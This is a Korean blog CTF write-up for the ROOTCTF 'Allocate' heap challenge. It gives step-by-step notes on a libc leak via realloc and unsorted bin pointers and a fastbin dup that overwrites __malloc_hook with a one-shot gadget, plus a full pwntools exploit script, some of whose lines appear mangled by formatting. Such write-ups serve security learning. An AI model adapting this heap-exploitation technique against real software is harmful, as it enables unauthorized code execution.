hOwDayS 선린 10720

ROOTCTF Allocate 본문

CTF

ROOTCTF Allocate

hOwDayS 2018. 3. 4. 22:49



fastbin dup문제.

unsorted bin 문제.

realloc을 사용한 leak문제.


RELRO 

FULL RELRO 

Stack Canary

Canary Found 

 NX

 NX Enabled

 PIE

 PIE Enabled









Modified 에서 calloc만 출력





1. Allocate smallbin (malloc 0) (0x108)


2. Allocate fastbin (malloc 1) (0x28)


3. Realloc malloc 0 인 bin 을 malloc 1 bin에게 영향을 줄 수 있도록 재할당. 

-> 원래 있던곳을 free하고 다른 곳에 재할 당 됨

->원래 있던 위치의 fd , bk 에 main_arena + 88 들어감


4. Allocate fastbin (calloc 0) (0x28) 

->원래 smallbin(malloc 0)이 있던 곳에 할당됨


5.Realloc calloc 0 (0x108) ( "B" * 6 * 8)


6. B* 6 * 8 후에 main_arena+88이 출력됨.



6번까지 다 한 후.


"B" * 6 * 8 하는 이유 파란색 참고.







익스가 Leak보다 더 쉽다


fastbin_dup 문제이다.


1. Allocate fastbin(malloc 2)


2 .Allocate fastbin(malloc 3)


3. free(2) , free(3) , free(2) 


4 .Allocate fastbin (size는 malloc 2와 같게) 

Content = &_malloc__hook - 35


5. Allocate fastbin (size는 malloc 3와 같게



6. Allocate fastbin (size는 malloc 2와 같게


7. Allocate fastbin //fastbin dup

Content = "\x00" * 3 + p64(0) *2 + oneshot_gadget


8.Allocate malloc

Any size


9.SHELL!!









1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
from pwn import *
 
 
 
= process("./Allocate")
 
 
 
def malloc_Allocate(size,content):
        p.recv()
        p.sendline(str(1))
        p.recv()
        p.sendline(str(1))
        p.recv()
        p.sendline(str(size))
        p.recv()
        p.send(content)
        p.recv()
        p.sendline(str(6))
 
def calloc_Allocate(size,content):
        p.recv()
        p.sendline(str(1))
        p.recv()
        p.sendline(str(2))
        p.recv()
        p.sendline(str(size))
        p.recv()
        p.send(content)
        p.recv()
        p.sendline(str(6))
 
def realloc_Allocate(choice,index,data,size): #malloc , calloc
        p.recv()
        p.sendline(str(1))
        p.recv()
        p.sendline(str(3))
        p.recv()
        p.sendline(str(size))
        p.recv()
        p.sendline(str(choice))
        p.recv()
        p.sendline(str(index))
        p.recv()
        p.send(data)
        p.recv()
        p.sendline(str(6))
 
def Modified(content,index,size):
        p.recv()
        p.sendline(str(2))
        p.recv()
        p.send(content)
        p.recv()
        p.sendline(str(index))
        p.recv()
        p.sendline(str(size))
 
 
def Free(choice,index): #Malloc , Calloc
        p.recv()
        p.sendline(str(1222))
        p.recv()
        p.sendline(str(choice))
        p.recv()
        p.sendline(str(index))
 
 
 
main_arena = 0x3c4b20
oneshot_target = 0x3c4b10 - 35
oneshot = 0xf1147
 
malloc_Allocate(0x108,"A"#m 0
malloc_Allocate(0x28,"A"#m 1
realloc_Allocate(1,0,"B",0x208)
calloc_Allocate(0x28,"A" * 0x28#c 0
realloc_Allocate(2,0,"B"* 6 * 8 , 0x108)
 
 
p.recv()
p.sendline(str(3))
p.recvuntil("B" * 6 * 8)
libc_base = u64(p.recv(6)+"\x00\x00"- main_arena - 88
 
log.info("Leak libc : " + hex(libc_base))
 
##Exploit 
 
malloc_Allocate(0x68,"A"#m 2
malloc_Allocate(0x68,"B"#m 3
#fastbin_dup
Free(1,2)
Free(1,3)
Free(1,2)
malloc_Allocate(0x68,p64(libc_base+oneshot_target))
malloc_Allocate(0x68,"A")
malloc_Allocate(0x68,"A")
malloc_Allocate(0x68,"\x00" *3 + p64(0* 2 + p64(libc_base+oneshot))
 
 
##Shell!
 
#malloc_Allocate(0x10,"A")
 
p.recv()
p.sendline(str(1))
p.recv()
p.sendline(str(1))
p.recv()
p.sendline(str(0x20))
p.interactive()
 
 
cs





코드는 https://github.com/LYoungJoo/CTF/blob/master/JuniorCTF/RootCTF/RootCTF.md을 참고했다.


Heap문제도 잼나네

'CTF' 카테고리의 다른 글

TRUTHEALTH SoHard  (0) 2018.03.10
TRSUTCTF sysrop  (0) 2018.03.08
TRUSTEALTH rpggame  (0) 2018.03.03
0ctf babyheap  (0) 2018.03.01
ROOTCTF Factorization  (0) 2018.02.20
'CTF' Related Articles more
Comments